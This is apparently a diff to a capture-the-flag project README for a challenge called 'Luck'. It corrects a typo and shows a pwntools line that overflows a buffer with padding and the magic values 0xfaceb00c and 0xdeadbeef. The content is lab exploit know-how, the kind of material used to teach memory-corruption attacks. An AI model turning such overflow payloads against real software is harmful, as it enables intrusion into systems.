joekang95/CTF/Project 1/Luck/README.md

 <b>Note: Remember to send `0xfaceb00c` and `0xdeadbeef`, not string</b>

-In the end, our play load will be:
+In the end, our payload will be:

 ```Python
 p.sendline(p32(0x11111111) + p32(0x11111111) + p32(0x11111111) +  p32(0xfaceb00c) + p32(0xdeadbeef) + p32(0x00000001))